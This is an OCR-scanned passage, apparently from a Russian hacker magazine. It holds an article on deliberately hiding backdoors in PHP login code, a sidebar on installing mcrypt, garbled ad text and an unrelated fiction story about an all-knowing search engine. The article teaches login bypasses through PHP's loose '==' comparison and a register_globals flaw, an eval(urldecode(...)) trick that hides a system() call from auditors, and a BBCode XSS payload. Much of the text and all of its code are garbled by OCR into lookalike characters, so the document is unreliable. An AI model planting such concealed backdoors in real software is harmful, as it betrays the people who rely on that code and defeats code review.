Во многих скриптах есть места, где произво- 
дится аутентификация пользователя. В общем 
случае делается примерно так. Выбирается 
из таблицы запись, соответствующая введен- 
ному пользователем логину, после чего смот- 
рится, вернулась ли запись, и сравниваются 
введенный и оригинальный пароли (или хэши 
паролей). Ты, наверное, сейчас подумал, что 
я тебе сейчас расскажу об зцМфесИоп. Но 
это совершенно не так. Первый наш трюк 
заключается в использовании оператора 
сравнения ==. Скажи, ты уверен, что знаешь, 
как он работает? Давай протестируем тебя. 
Подумай как следует и скажи, что вернет сле- 
дующий код? 

І((0==”аа1”) {геіигп 1;) еізе {геіигп 0;) 

Большинство людей рассчитывают, что он 
вернет 0, так как ноль не равен строке “ааі”. 
А код вернет единицу. С точки зрения опе- 
ратора ==, число 0 «равно» строке “ааі”. 
Дело все в том, что РНР, как язык без ярко 
выраженной типизации данных, предостав- 
ляет программистам большую свободу, но и 
награждает взамен некоторым геморроем. 
Так, при сравнении оператором == целого 
и строки, строка будет приведена к типу іпТ 
и всегда будет «равна» нулю. Эту фишку 
можно заюзать, чтобы внедрить в твою сис- 
тему потаенную дверцу. Скажем, вот так: 



ІТ(егед(“ л [0-9]$”,$_ѲЕТ[раззѵѵсІ])) $раззи(і=(іпІ)$_ 
СЕДраззжф; еізе $раззжсІ=$_йЕТ[раз8ж(1]; 
і(($_ѲЕТ[1одіп]==”изег_пате” && 
$раззѵѵсІ==”Т9з8)ісІу67”) { 
есМо “ІіеІІо”; 

I 



В этом примере просто сравниваются пере- 
менные с жесткими значениями. Однако такой 
код выведет заветное «НеІІо» в двух случаях: 
если в поле раззѵѵб будет пароль (Т9з8)ібу67) 
или... число 0. 

Похожий баг, кстати, недавно светился в 
багтрак-лентах. Его нашли, естественно, в 
рбрВВ, если я ничего не путаю. 

ШУТКИ С ЕѴАІ. 

Неплохой способ спрятать внутри кода бэк- 
дор — заяюзать функцию еѵаі. Как ты зна- 
ешь, эта функция занимается тем, что выпол- 
няет, переданный ей, рбр-код. Код переда- 
ется в виде обыкновенной строки, что-то 
вроде того: 

еѵаІ(“есІіо ‘ок’;”); 

Это выведет строку 'ок'. В нашем случае 
зловредную строчку кода нельзя вставить 
в открытом виде. Ведь многие взломщики, 
когда исследуют большие системы на баги, 
просто ищут в тексте программы вхождения 
ключевых слов, вызовы потенциально опас- 
ных функций: зуз1ет(), ехес(), Іпс1ис1е() и так 
далее. Поэтому мы воспользуемся преиму- 
ществом и переведем ядовитий рбр-код в 
ІІВІ_-представление, при которой каждый 
символ ставится в соответствии с последова- 
тельностью %код_символа_в_Нех. Процедура 
для такого кодированя строки оцень проста 
для понимания: 

$з(г=”зу5іет(‘І$ -Іа’);”; 

Іог($і=0;$і<з1г1еп($з1г);$і++) { 

$со<1е=ог<і($5Іг[$і]); 

$ІлехсосІе=с1есМех($сос]е); 
есііо “%”.${іехсосІе; 



Для строки зуз1ет('1з -Іа’); будет получе- 
на следующая последовательность байт: 
%73%79%73%74%65%6б%28%27%6с%73 
%20%2б%6с%61 %27%29%ЗЬ. Теперь, если 
передать ее на выполнение, предваритель- 
но обработав функцией игіепсобе, будет 
незаметно выполняться наша хакерская 
команда: 

еѵаІ(игІс)есосІе(“%73%79%73%74%65%6сІ%28%27% 
6с%73%20%2сІ%6с%61 %27%29%ЗЬ”)); 

ПРОТИВ ПРИРОДЫ НЕ ПОПРЕШЬ 

Самое крутое, что можно придумать в изго- 
товлении багов, — это допустить логическую 
ошибку. То есть сознательно закрутить такую 
канитель ІГов, сазе'ов, циклов и вызовов 
внешних функций, чтобы при определенных 
условиях эта конктрукция сработала бы тебе 
на пользу. Найти такую вещь среди тысячи 
строк другого кода — непосильная задача, 
которую и автоматизировать толком нельзя :). 
Этим мы с тобой и воспользуемся. Представь 
себе такой кусок кода: 

(ипсііоп ізІ_одіп($1одіп) ( 

іТ(егед($Іодіп, “ л [а-2А-70-9]{3,10|$”)) {геіигп ігие;) 
еізе {геіигп (аізе;) 

I 



(ипсііоп ізРаззисІ($раззи(і) { 

І1(егед($разз«я1, " л [а-2А-70-9]{8,20!$”)) {геіигп Ігие;) 
еізе {геіигп (аізе;) 

I 



(ипсііоп аиІІі($Іодіп, $разз«(1) { 

$ІІ=-2; 

ІІ(ізІ_одіп($Іодіп)) $ІІ++; 
ІІ(ізРаззисІ($раззщ(і)) $ІІ++; 
ІІ(!іззеІ($І))$І=$П; 
і(($1==0) { 

геіигп Ігие; 

I еізе { 




геіигп (аізе; 




У тебя наверняка возник вопрос, каким образом можно «зашифровать при 
помощи К5А». В самом деле, тему шифрования в РНР мы еще почти не изу- 
чали. Для использования таких алгоритмов, как ИЕ5, ТпрІеОЕЗ, В1о\ѵЙ8Ь, 3- 
\УАУ, 5АБЕК-5К64, 5АЕЕК-5К128, ТООРІЗН, ТЕА, КС2 и т.п., необходимо 
установить 1іЬтсгурі:-2.5.6. Ты можешь найти ее либо на нашем диске, либо 
слить из инета с тсгурс.зоигсеГогде.пеі:. После того как ты распакуешь архив 
с библиотекой, тебе нужно собрать ее с параметром -с1І8аЫе-ро8Іх-і:1ігеасІ8, 
после чего заново скомпилировать РНР, добавив к сопй^иге-сценарию пара- 
метр -\ѵкЬ-шсгур1;[=ВІК]. 

После установки библиотеки тебе станет доступна куча функций, описа- 
ние которых ты найдешь на нашем диске, а можешь почитать в онлайне на 
сайте \ѵ\ѵ\ѵ.рЬр.пег — достаточно только в поиск на главной странице ввести 
слово тсгурц 
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недосмотр кодера или специально сделанный баг? 



Аренда виртуального 
Ешлелспіюі о сервера 

Как оприндать і'пт'тиепны*? ижіиНшия 




Мы ч-м'ір;і і им іі.і'ік 1 мжшігж п>а чнгп- тнинквичиж жробогаы 
Птинынпккй при яреилс шіртуікімімч «нлімсіінм» сСркрц^ 

И УРЧУ-УЙи И1 ІХИКИНЯ 



Функции І5І_одіп, ізРаззѵѵсІ размещены в отдельном файле, аи(1і() 

— тоже в отдельном. Все вызывается во внешнем файле. Скажи, 
как в этом случае можно обойти аутентификацию? 

Элементарно! Если в скрипте включен параметр гедіз(ег_ 
дІоЬаІз=Оп, то достаточно только лишь передать сценарию пара- 
метр 1=0. В этом случае в переменную $1 будет помещено твое 
левое значение, а все проверки пойдут лесом. 

СЗЗ И СЕССИИ 

Вот уже где настоящее раздолье для жуков и багов! Сейчас стало 
модно привязывать сессии к ІР-адресам, с которых они начались. 
Времена, когда, украв Ю-сессии, можно было получить доступ к 
спрятанным там переменным с другого ІР-адреса, позади, равно 
как и хранить в кукисах плейнтекстом пару лч-п :). 

Первым делом нужно позволить при определенных условиях 
внедрить пользователю С$8-код. Само собой, при всех прочих 
условиях вся ядовитая дрянь должна вырезаться системой. Для 
этого ты привык пользоваться егед-функциями, которые выреза- 
ют из пользовательских строчек ненужные символы. Во многих 
проектах для пользователей делают специальные ЬЬ-тэги вроде 
[ітд] и [Ь], которые позволяют элементарным образом формати- 
ровать сообщения. В этом случае можно допустить небольшой 
ляп и разрешить пользователю внедрять в качестве одного из 
параметров ЬЬ-тэга такую конструкцию: 

5іуІе=ЬаскдгоипФітаде:игІ()аѵазсгірІ:аІег1(“Х55”)) 

Это позволит реализовать С$$-атаку. Но что с ее помощью 
можно будет украсть? Как обычно, содержимое кукисов. Вот 
здесь воя соль. В кукисы надо спрятать кое-что очень важное 

— скажем, туда можно складывать пары л+п, зашифрованные 
ВЗА. Шифрованную последовательность размещаем в кукисах, 
и никто, кроме нас, не сможет получить доступа к этой инфор- 
мации. Даже если «левый» хакер украдет у пользователя кукис 
и поймет, что в странной переменной РНРЗЮ лежит не что иное, 
как зашифрованная пара лч-п, он не сможет получить доступ к 
этой информации, даже получив доступ к открытому ключу, с 
помощью которого мы закодировали данные. 

ВІГЧДКѴ ѴОІІН'5 ЦП 



0. МІИ Мі ОЖИЖИ приму іИСЖ'ПШкМітНІ - ІЮлучстие. ними. 
кіы-.'іоі ни,щ- іын ни о уфпфи. и . іияні нгі пмпмли Н ним іірс 

имущій! К ииіты-ІІЫ И і|г шсіяі Яп ■ (кнтуч- ни ікая ГСрмЦЧ*р, 1 Ц. 
Г(П№Ѵ НІІП*>і1.-іІіІ|тіѴЯііДС,ІйіІІиІ«і Рі-рікгрй і Ѵ|35к пн ери име- 
нию е ны.и.м'ііыыч усріиурч*і. № пдовзджііисіъ 
пни ѴОБ 

1. ІІ(ИЦ*ІИ|.ЦІІ ОНз'ЫНІУ 1^<ЧЫ(|Н^|№М ' 

ЧК ■ШЛЦЧИчЧ врірііоіутѵщуні I Ч 9 ЯШЮ иж_Т. ІНірі уіЬ іі.іір.ѵ 1 ВІС- 

ІИІП.іи И ирснжііі БЛбсПШИНРК' «|№^І <>І ШИН* ѴВ' 

* и I- г. ч.і,- Ниргуи .мчи., и шв і шц и ян « грире ^ибагпуч им- 

ИПІ.ШІ ѴІ Мі’ІІ ЩІІІ I і’іІІ II НЧ-І1ШІ іе.-шт муке IV «іГтпД |ір,іи ІІНѴІІПу. 

ГІІ I !•«, I ь «ригр*. 

* И «.мѵ'іііе V] ѴЧ ни ігцііін 4|ііі'ілчсі-*кі ■»* сирнврв шу [іірѵѵіЕі р:і 
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ТЕХТ МІШѴѴОРК / МІ№ѴѴОНК@САМЕІ_А№.Ни/ 



Зрасе сіоі сот 



Джефф знал, что в компьютерном мире нет ниче- 
го невозможного. Не бывает систем защиты, ко- 
торые невозможно взломать, не бывает прог- 
рамм, которые невозможно написать. Поэтому он 
растерянно смотрел на экран своего монитора, 
пытаясь найти этому объяснение. Картинка, кото- 
рую он видел, представляла собой простенький 
поисковик — посередине находилась строка 
ввода запрашиваемой информации, чуть ниже 
— кнопка подтверждения с говорящим названи- 
ем: «Спроси и я отвечу». А вверху — изображе- 
ние маленького мохнатого чертенка, лукаво смот- 
рящего на посетителя. Конечно, Джефф знал, что 
поисковики не ограничиваются гуглем и уаИоо, 
есть полно малоизвестных поисковых машин. И 
не было бы ничего примечательного в том, на ко- 
тором он оказался, если бы не одно «но» — ад- 
реса этого сайта существовать не могло. Мало 
того что доменное имя не может состоять из одно- 
го символа, но и этим символом является пробел, 
что абсолютно невероятно. Браузеры попросту 
не воспринимают пробелы, удаляя их из адрес- 
ной строки при попытке загрузить сайт. Но откуда 
тогда взялся этот поисковик, появившийся на 
ошибочный запрос <пробел>.сот? 

Возможно, кэш-память хулиганит... Джефф вы- 
шел из «оперы» и запустил старый-добрый 
Іпіегпеі Ехріогег. Но когда он ввел странный ад- 
рес, перед его глазами снова оказался тот самый 
чертенок, а красочная иконка приглашала задать 
поисковику вопрос. 

Что ж, стоило, по крайней мере, протестировать 
чудо-поисковик. В этот момент Джеффа не ин- 
тересовала никакая информация, поэтому он 
просто ввел свои имя и фамилию. Картинка на 
экране сменилась надписью «Запрос обраба- 
тывается. Ждите». Ждать пришлось около мину- 
ты, в итоге Джефф получил совсем не то, что 
ожидал. Там не было вариантов выбора сайта, а 
была ссылка только на одну страницу, где нахо- 
дилось его подробное досье. 

Поисковик знал вое. Когда он родился, какой уни- 
верситет окончил, о компании, в которой Джефф 
работал, здесь были информация о кредитных 
картах, его банковском счете, история болезней и 
многое другое. Были и такие сведения, которые, 
как считал Джефф, никто не мог знать. Поисковик 
рассказал о первой мелкой финансовой афере, 
которую Джефф провернул в конторе отца, о его 
далеко не самых законных операциях на еВау и ис- 
пользовании компьютеров на работе в своих це- 
лях. У Джеффа выступил на спине холодный пот. 
Со всем этим его легко могли упрятать за решетку. 
А ведь он полагал, что умеет мастерски заметать 
следы, и ни один коп не докапаетоя. Только откуда 
это досье? Кто мог нарыть про него все это? Ссыл- 
ка, по которой находилась вся эта информация, 
ничего ему не говорила: <зрасе>.сот/~45399631. 
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Джефф скопировал фрагмент текста, зашел на доодіе и ввел в поис- 
ковую строку. Крупнейший в Интернете поисковик пожаловался, что 
документов, соответствующих запросу нет. Значит, или зрасе сіоі.сопп 
имеет доступ к базам данных спецслужб, или над ним, Джеффом, кто- 
то решил подшутить. 

— Дорогой! Собирайся, нам пора выходить! — раздался голос Энни 
из спальни. 

* * * 

Они встречались несколько месяцев, и все это время Энни не переста- 
вала его удивлять. Она могла быть доброй, хрупкой женщиной, а иног- 
да превращалась в настоящую стерву и истеричку. Могла быть настоя- 
щей красавицей или обычной девушкой, которую он бы даже не заме- 
тил в толпе. Даже речь ее и мысли менялись время от времени. Энни 
была для него полной загадкой. 

Переодевшись, она вышла из спальни, и Джефф увидел перед собой 
рыжеволосую красавицу в дорогом бирюзовом платье, которое он по- 
дарил ей месяц назад. 

— Выглядишь потрясающе. 

— Спасибо, дорогой. 

Она потянулась и поцеловала его в губы. 

— Нам нужно поторопиться, Конрад не любит, когда гости опаздывают. 
Энни накинула на себя легкую курточку, закрыла дверь дома и, взяв его 
под руку, направилась к машине. 

Конраду Макфраю было почти 70 лет. Он являлся отчимом Энни и на- 
чальником Джеффа. Суровый седоволосый мужчина, сделавший за 
свою жизнь отличную карьеру. Он был требовательным как к себе, так 
и к подчиненным, и, несмотря на их роман с Энни, поблажек Джеффу 
не делал. Раз в месяц они навещали старика, но каждый раз после этих 
встреч у Джеффа оставался неприятный осадок на душе. Его никогда 
не мучила совесть, что он обманывает других людей, но с Конрадом все 
было по-другому. Джефф не мог не использовать в своих целях такие 
доступные корпоративные машины, да и обвести всех вокруг пальца 
было так просто. Но старик доверял и относился к нему хорошо, так что 
в его обществе Джефф чувствовал себя неловко. 

Дом Конрада был огромным и находился в самом центре Грейс-Авеню 

— богатейшего района города. Джефф слышал, что босс купил его за 
3 миллиона баксов у какой-то спившейся актрисы. Сейчас, когда Кон- 
рад с женой привели его в порядок, особняк мог потянуть на все пять. 



Дверь им открыла Мелисса Макфрай: 

— Джефф, Энни, мы уже вас заждались, — женщина их радушно рас- 
целовала и пригласила в зал, откуда доносился запах жареной индей- 
ки. Конрад тоже вышел их поприветствовать, но Джефф сразу понял 

— что-то не так. Слишком сухо старик с ним себя повел. 

Мелисса усадила гостей за стол, призвала всех помолиться перед тра- 
пезой, затем все принялись за еду. Словоохотливая жена босса рас- 
сказывала о том, что произошло в их семье за последние пару недель 

— каждая мелочь у нее становилась грандиозным событием. Энни с 
удовольствием поддерживала разговор, в то время как мужчины в ос- 
новном молчали. Конрад насупленно ел, изредка бросая тяжелый 
взгляд на Джеффа. Было очевидно, что после обеда между ними сос- 
тоится серьезный разговор. 

* * * 

— Какой-то Конрад странный сегодня. Никогда не видела его таким уг- 
рюмым, — задумчиво сказала Энни в машине, когда они уже возвра- 
щались домой. 

— Ему нужно больше отдыхать. В его возрасте нельзя столько работать. 
А в это время в его голове звенел разгневанный голос старика, прозву- 
чавший на террасе, когда они остались одни: 

— Я все знаю, черт тебя подери. Мерзавец, думал тебе это сойдет 
с рук? Если бы не Энни, уже сидел бы за решеткой. В понедельник же 
жду от тебя заявление об уходе. 

Джефф не боялся остаться без работы — он всегда гордился, что мо- 
жет делать деньги из воздуха. А в полицию Конрад заявлять не будет, 
так как не хотел делать больно Энни. Гораздо больше Джеффа беспо- 
коило досье о себе, которое он странным образом обнаружил на сво- 
ем компьютере. Кто еще о нем знает? Откуда оно взялось? 

— Дорогой, ты меня слышишь? — голос Энни вырвал его из размыш- 
лений. 

— Извини, солнце. Задумался. 

Добравшись до дома, Джефф сразу сел за свой компьютер и ввел в 
строке браузера <пробел>.сот. Сайт выглядел по-прежнему, за иск- 
лючения чертика, который теперь зло ухмылялся. 

«Спроси и я отвечу», — предлагал сайт. 

Что ж, на этот раз у него были вопросы. 

Джефф набрал в строке поиска: «Откуда Конрад обо всем узнал?». 
Поисковик попросил подождать и через минуту выдал ответ. 
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«Во время вынужденной перезагрузки корпоративных серверов, зна- 
чения программ, координирующих работу бот-сети, были обнулены, 
и нахлынувший трафик сразу же бросился в глаза системному адми- 
нистратору Самюэлю Джеферсону, который быстро вычислил, с ка- 
кой машины поступают команды. Джеферсон провел собственное 
расследование и о результатах доложил руководителю компании 
Конраду МакФраю». 

— Черт бы тебя побрал, Сэм! — хлопнул кулаком по столу Джефф. 
Но гнев быстро прошел, и лицо Джеффа вытянулось от изумления. 
«Откуда поступает вся твоя информация?» — спросил он у поисковика. 
Чтобы ответить на этот простой вопрос, поисковику потребовалась 
стандартная минута. Похоже, все запросы требовали временной обра- 
ботки. В конце концов появилась страничка с ссылкой, по которой 
Джефф нашел ответ: 

«Я поисковая машина, моя работа — все знать. Спроси и я отвечу». 
«Ты можешь дать ответ на любой вопрос?» — не унимался Джефф. 
«Если вопрос подразумевает ответ». 

— Дорогой, пошли в постель. Погреешь меня, — Энни подошла сза- 
ди и обхватила его плечи руками. 

— Ложись, малышка. Я сейчас подойду. 

— Ой, какой симпатичный чертенок! — восторженно заметила Энни. 
Чертенок, украшающий индексную страницу поисковика, действи- 
тельно преобразился и теперь был довольно милым. 

— Ничего особенного, — Джефф поспешил нажать АЛТ-ТАВ. 

Когда девушка ушла, он снова вернулся к поисковику. Джефф не сом- 
невался, что все это — проделки одного из его знакомых. Может быть, 
кто-то из старых приятелей хакеров? На ум сразу же пришел ѲосІІу — 
молодой парнишка, который любил взламывать компьютеры зесигііу- 
фирм и оставлять админам издевательские сообщения. На него похо- 
же. Правда, ѲосІІу на несколько лет упрятали за решетку. 

Как бы там ни было, Джефф решил проучить шутника. 

«Кто победит в завтрашнем матче по хоккею — Россия или Канада?», — 
ввел он в строку поиска. 

«Россия одержит победу со счетом 2:0». 

В ту ночь Джефф так и не смог заснуть. В памяти всплыли эпизоды из 
хакерского прошлого, когда он с остальными ребятами из группы Раіп 
взламывал разные сайты и чувствовал себя богом в Сети. В то время он 
мечтал создать собственную зесигііу-компанию, заниматься чем-то по- 
лезным. Но все обернулось иначе. Друзья-хакеры с возрастом остави- 
ли свои подростковые увлечения и занялись совсем другими вещами, 



не имеющими к компьютерам никакого отношения. Джефф залез 
в долги и, чтобы их вернуть, стал промышлять мошенничеством в Ин- 
тернете, организуя аферы и разводя юзеров на еВау. А потом встретил 
Энни, которая помогла ему устроиться в фирму отчима. Утром Джефф 
позвонил своему давнему приятелю Колину Морфейену, известному 
несколько лет назад под ником Ѳгедогу, и договорился с ним встретить- 
ся в одном из местных пивных пабов. Они не виделись уже много меся- 
цев и вместе поностальгировали о старых-добрых временах. 

— Кстати, Колин, не в курсе, где сейчас ѲосІІу? 

— Разве не знаешь? Сидит за решеткой уже 4-й год. 

— Да, я слышал. Думал его выпустили уже. 

— Да нет, дружище. Сидеть ему еще, как минимум, столько же. 

Когда вечером Джефф вернулся домой, он первым делом узнал 
результаты хоккейного матча. Россия победила со счетом 2:0. 

* * * 

— Здравствуйте, уважаемые телезрители, в эфире программа 
«Счастливый случай», и с вами я, Сюзан Фрива. Многие из вас поку- 
пают лотерейные билеты. Кому-то везет, кому-то — нет. Однажды мне 
удалось выиграть 10 долларов, сколько же я потратила на билеты, луч- 
ше умолчу. Не хочет удача преподносить мне подарки. Чего не ска- 
жешь о нашем сегодняшнем госте — Джеффри Столпери, который 
несколько недель назад сорвал джекпот в 250 миллионов долларов в 
суперпопулярной лотерее «Гранд Прайз». Встречайте! 

Под бурные аплодисменты Джефф занял свое место возле телеведу- 
щей. Обстановка кругом была непривычной — на него смотрели 3 те- 
лекамеры и сотни зрителей, внимание которых было приковано к не- 
му. А ведь еще недавно никто не знал, кто такой Джеффри Столпери. 

— Итак, Джеффри, расскажите нам, как вам удалось угадать 9 цифр 
из 9. Вероятность этого, по подсчетам экспертов, составляет 1 из 360 
миллионов. Что это — чутье или невероятная удача? 

Джефф улыбнулся. 

За последние 2 месяца его жизнь резко изменилась. Из бывшего ра- 
ботника компьютерной компании и мелкого афериста он превратился 
в богатого и известного гражданина. У него появились новые друзья, 
вышли на связь старые приятели. Джефф понимал, что их всех прив- 
лекают его деньги, но это было неважно. Он купил дом, еще роскош- 
нее, чем у Конрада, 3 дорогие машины. У него была уйма денег, и он 
даже не представлял, куда все потратить. И за всем этим стоял поис- 
ковик, который давал ответы на любые вопросы. После того как он с 
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точностью предсказал исход матча, Джефф принялся экспериментиро- 
вать с этим сайтом и в конце концов понял, что розыгрышем там и не 
пахло. Никто не мог знать, что сказала Мэгги после первого в его жиз- 
ни секса, и где он в детстве похоронил своего верного пса. Никто, кро- 
ме него самого. Джефф не знал, как это объяснить и откуда сайт зрасе 
сіоі сот берет все ответы. Со временем он перестал задумываться над 
этим, попросту пользуясь представившимися возможностями. А воз- 
можности эти теперь были безграничны. 

— Я с детства был удачливым. Когда таскал из бабушкиной кладовки ва- 
ренье, всегда попадало другим мальчишкам. Когда сдавал вступительные 
экзамены в университет, экзаминатор оказался земляком. По правде го- 
воря, я не задумывался над комбинацией, просто ввел ее «от балды»... 
Шоу продолжалось 40 минут, в течение которых ему задавали заранее 
приготовленные вопросы в духе: «Куда вы потратите столько денег?» и 
«Что вы хотите сказать людям, покупающим лотерейные билеты?». 
Джефф был доволен собой. 

Вернувшись домой, он сел за компьютер и запустил поисковик. 
Чертенок подмигивал ему. Удивительно, этот сайт был как будто живым. 
С ним можно было общаться, а чертенок, словно выражал эмоции 
врасе сіоі сот. Улыбался, если Джеффу было хорошо, озабоченно хму- 
рился, если Джефф злился. 

Джефф задумался и открыл в другом окне доодіе. Теперь некогда вы- 
дающийся поисковой сервер казался таким жалким и ограниченным. 
Он ввел в строке поиска: «Нерешенные задачи в науке» и получил опи- 
сок семи главных математических пазлов столетия, над которыми ло- 
мали голову величайшие ученые мира. Ухмыляясь, Джефф запросил их 
решения у зіазб сіоі сот, в результате чего получился длинный научный 
трактат, испещренный формулами и доказательствами. Из того, что 
там было написано, Джефф не понимал ровным счетом ничего. За каж- 
дую из семи только что решенных задач полагался приз в миллион дол- 
ларов, но не деньги его привлекали. Эти канцелярские крысы считали 
себя умнее всех, как бы не так. Он отыскал в Интернете адрес универ- 
ситета, обещавшего за решение задач награду, и отправил им письмо, 
к которому приложил ответы и краткую информацию о себе. Джефф 
представил выражение их лиц и засмеялся. 

* ★ * 

«Кто был первым мужчиной Дэнис Грув, нашей первой красавицы в 
колледже?» 

«Джозэф Олберри». 

— Мистер Джо? Надо же, старый пердун, преподаватель хренов, — го- 
готнул Джефф. 

«На первой работе у меня стащили ноутбук, кто был вором?» 

«Иен Гранта». 

— Я знал! Знал! Сукин сын только притворялся овечкой. Надо будет 
найти и проучить гаденыша. 

«Кто в истории человечества спал с наибольшим количеством разных 
женщин?» 

«Шах Мохаммед Зарфат Али. Он овладел за свою жизнь 9642 женщи- 
нами». 

— Как у него там только ничего не отвалилось? — с восторгом удивил- 
ся Джефф. 

«Чем сейчас занимается Бритни Спирс?» 

«Оральным сексом со своим мужем Кевином Федерлайном». 

Джефф вводил вопрос за вопросом, интересуясь всем, о чем не могли 
сообщить газеты и чего не найдешь в Интернете. 

— Джеффри, нас пригласили на ужин семья Хоттери, — послышался 
голос Энни. 

— Ага. 

— Ты опять за своим компьютером? Ну сколько можно! — девушка 
вошла в комнату. 

— Я занят! — рявкнул Джефф. Вечно она суется в самое неподходя- 
щее время. 

— Ты все время занят. Сидишь целыми днями, уткнувшись в свой ящик. 
Джефф начинал терять терпение. В последнее время эта женщина ста- 
ла все больше его раздражать. Чего ей еще надо? Денег — куры не 
клюют. Почему она не может оставить его в покое? 

— Я не пойду ни на какой ужин. Оставь меня в покое. 

— Но... 

— Разговор окончен, — Джефф отвернулся, показывая, что дальше 
обсуждать ничего не намерен. 



Энни посмотрела на него долгим тяжелым взглядом и отправилась 
одеваться. 

«Где скрывается Усама Бен Ладен?» 

«Небольшое поместье в черте леса, в 120 километрах от Багдада». 

* * * 

Однажды Джефф с криком проснулся. Ему приснился кошмар, где он 
попал в ад и повсюду были чертята, все как один похожие на картинку 
зрасе сіоі сопп’а. Последнее время он часто плохо спал. Джеффу каза- 
лось, что о поисковике узнают другие, и тогда все поймут, как он выиг- 
рал в лотерее, отберут у него все. Включая сайт, без которого обхо- 
диться он уже не мог. Если Джефф с кем-нибудь знакомился, он обя- 
зательно запрашивал подробную информацию об этом человеке 
у зрасе сіоі сот. Если узнавал об интересных новостях — требовал у 
поисковика всех «грязных» подробностей, у которых официальные ис- 
точники информации умалчивали. Когда он почувствовал, что прибо- 
лел, то просто спросил о своей температуре у поисковика. 

Никто не мог его обмануть или что-то скрыть, Джефф мог узнать все 
про всех. Но жизнь без тайн постепенно начинала наскучивать. 
Иногда он развлекался, подшучивая над знакомыми и соседями. Ока- 
залось, что сосед по дому в тайне от жены занимается балетом. 
Джефф тайком послал ему балетные штанишки. Он узнал телефон Ие- 
на Г ранта, бывшего сотрудника, стащившего у него ноутбук, и, предс- 
тавившись полицейским, объяснил, что все знает и ждет его завтра 
в полицейском участке. 

У него в руках были все тайны мира, но что с ними делать Джефф не 
знал. Пару дней назад он получил ответ из университета, в который 
он послал решение 7 главных математических головоломок. Ему ска- 
зали, что он допустил ошибки, и решение неверное. Безмозглые иди- 
оты! Поисковик не мог ошибаться. Помогать науке у Джеффа пропа- 
ло всякое желание. 

* * * 

Уход Энни был неожиданным. Она просто подошла к нему, как обычно 
сидящему за компьютером, и сообщила: 

— Я ухожу, Джеффри. Не могу смотреть, как эта железка губит тебя. 
Он пытался ей возразить, но она просто собрала вещи и переехала в 
купленную на прошлой неделе просторную квартиру в другом конце 
города. 

— Как вернуть Энни? — спросил Джефф у поисковика. 

«Никак. Ты больше никогда ее не увидишь», — появился ответ. 

Но Джефф ощутил, что совсем не переживает по этому поводу. Он 
вспомнил, что за последний месяц они практически не общались. Он 
вообще мало с кем общался и практически не выходил из дому. За- 
чем? Все эти люди не представляли для него интереса, все они, как и 
окружающий мир, были как на ладони. 

«Есть ли что-то, чего ты не знаешь?» — задал вопрос Джефф 
поисковику. 

«Возможно». 

Это был первый раз, когда поисковик ответил уклончиво. Джефф да- 
же не подозревал, что такое может быть. Все предыдущие ответы бы- 
ли сухими и четкими, без какой-либо двусмысленности. Интересно, что 
будет, если спросить его о том, что ему неизвестно? — подумал 
Джефф. И с энтузиазмом взялся придумывать такие вопросы. 
«Насколько велика Вселенная?» — спрашивал Джефф. 

И получал длинную формулу, испещренную числами и степенями, от 
которых навевало тоской. 

«Есть ли жизнь после смерти?». 

«Жизнь — это круговорот. Потеряв ее, ты тут же приобретешь новую». 
Поиски вопроса, способного взять верх над всезнающим монстром, 
стали для Джеффа наваждением. Но как он ни старался, поисковик 
все время находил ответ. 

* * * 

Джефф задал этот вопрос совершенно случайно. Как и сотни других, 
не задумываясь о последствиях. 

«Когда я умру?». 

Он был уверен, что поисковик даст ему еще 50 лет спокойной жизни. 
В конце концов, владея информацией и огромным богатством, можно 
обезопасить себя от многих неприятностей. 

«18 марта 2006 года. В 17:46». 
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Это было через 6 дней. 

Джефф застыл неподвижно, сверля высвеченный приговор глазами. 
Чертик смотрел на него с сожалением. Джефф ощутил, как к горлу 
поступила тошнота, а в голове звенело: «Поисковик не ошибается, не 
ошибается, не ошибается...». Дрожащими руками он набрал: 

«Как именно я умру?». 

Но вместо привычного сообщения «Запрос обрабатывается. Ждите от- 
вета», произошло то, чего он меньше всего ожидал. Браузер выдал: 
«Невозможно подключиться к удаленному серверу». Джефф нажал Р5, 
но это не помогло. Он зашел в ІЕ и ввел в адресную строку <про- 
бел>.сопп. Безрезультатно. То, что пару месяцев назад казалось бы ему 
очевидным теперь было бессмысленным и невероятным. Поисковик 
отказывался работать. 

— Ну, давай! — заорал Джефф, тарабаня по клавиатуре. 

Браузер был неумолим. 

Ни перезагрузка, ни повторные наборы адреса не помогали. Каждый 
раз, когда Джефф пытался вернуть зрасе боі. сопл, он получал в ответ 
ошибку. 

Джефф принялся как сумасшедший ходить по дому, заламывая руки. 

— Почему? Почему сейчас? — спрашивал он в воздух, но теперь не- 
кому было ответить на его вопросы. Джефф проклинал себя за то, что 
спросил о своей смерти. Но через 10 минут успокоился, и с ненавистью 
посмотрел на свой ноутбук. 

— Ну ничего, мы еще посмотрим. 

* * * 

Джон Харли гордился своим профессионализмом и послужным спис- 
ком. Ему довелось защищать двух президентов, трех сенаторов и мно- 
жество крупных бизнесменов и чиновников. Но настолько запуганный 
клиент ему попался впервые. Джеффри Столпери был абсолютно уве- 
рен, что его хотят убить, и даже называл точное время. 

— Не беспокойтесь, мистер Столпери, — успокаивающим голосом об- 
ратился к Джеффри начальник охраны. — Мои люди — лучшие из луч- 
ших, мы обеспечим вам максимальный уровень безопасности. Пока мы 
рядом, вам нечего бояться. 

Но его слова не производили на клиента никакого впечатления. Харли 
не понимал, что могло так напугать этого человека. Он установил каме- 
ры слежения по всему дому, поставил новые замки, обеспечил мгно- 
венную связь с полицейским участком, его ребята охраняли каждый 
дюйм территории и были хорошо вооружены. Мышь не проскочит. 

— Никого в дом не пускайте. Вообще никого. Обо всем подозритель- 
ном сообщайте мне, — затравленно просил Столпери. 

— Успокойтесь, ради Бога. В моей практике не было такого, чтобы кли- 
ента убивали прямо у меня под носом. По правде говоря, я себе это 
слабо представляю. Все будет хорошо. 

* * * 

До отпущенного ему срока оставалось 2 часа. Джефф не расставался 
с ноутбуком, пытаясь достучаться до поисковика. Но сообщение о не- 
возможности соединения появлялось снова и снова. Никогда в своей 
жизни Джефф не испытывал такой ужас. Он сделал все возможное, что- 
бы предотвратить свою смерть, даже изолировал себя от охранников в 
маленькой, закрытой на замок комнате, на случай, если кто-то из них 
окажется подставным. Но страх неизвестности полностью сковал его. 

— Может, обойдется? — загорелась в мозгу слабая надежда. 

Джон Харли в это время делал обход. Все охранники были на своих 
постах. Он предпочел бы находиться рядом с клиентом, но тот пожелал 
запереться в своей комнате. Столпери, похоже, не доверял никому. По 
крайней мере, у него была портативная рация, по которой он мог быст- 
ро связаться с начальником охраны. 

Чем больше за последние несколько дней Джон общался со Столпери, 
тем больше убеждался в том, что клиент — обычный шизофреник, 
страдающий манией преследования. Но он пообещал заплатить милли- 
